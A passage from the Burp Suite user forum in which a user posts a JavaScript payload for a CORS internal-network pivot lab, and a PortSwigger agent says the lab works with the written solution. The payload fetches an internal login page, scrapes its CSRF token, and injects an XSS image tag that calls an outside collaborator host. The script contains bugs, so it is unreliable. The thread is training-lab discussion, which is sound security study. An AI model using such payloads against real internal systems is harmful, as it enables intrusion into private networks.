The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: CORS vulnerability with internal network pivot attack

P1N | Last updated: May 15, 2023 08:34PM UTC

The LAB doesn't work, so I tried it myself, because we overestimate it, it doesn't work !! <script> bu_url = 'https://' + 'pf8ramweqox3mawt6h1l1w6v3m9ex3.oastify.com'; url = `http://192.168.0.135:8080/login`; fetch(url).then(response => response.text()).then(text => { const pareser = new DOMParser(); const doc = pareser.parseFromString(date, 'text/html'); const csr = doc.getElementsByName('csrf')[0].defaultValue; var pa = `"><img src='${bu_url}'?foundXSS=1>` var url_pa = 'http://192.168.0.135:8080/login?time=' + Date.now() + '&username=' + encodeURIComponent(pa) + '&password=test&csrf=' +csr; location = encodeURIComponent(url_pa); }) </script>

Ben, PortSwigger Agent | Last updated: May 16, 2023 08:09AM UTC

Hi, I have just run through this lab and was able to solve it using the written solution so it does appear to be working as expected. Have you tried following the solution?

P1N | Last updated: May 16, 2023 09:21PM UTC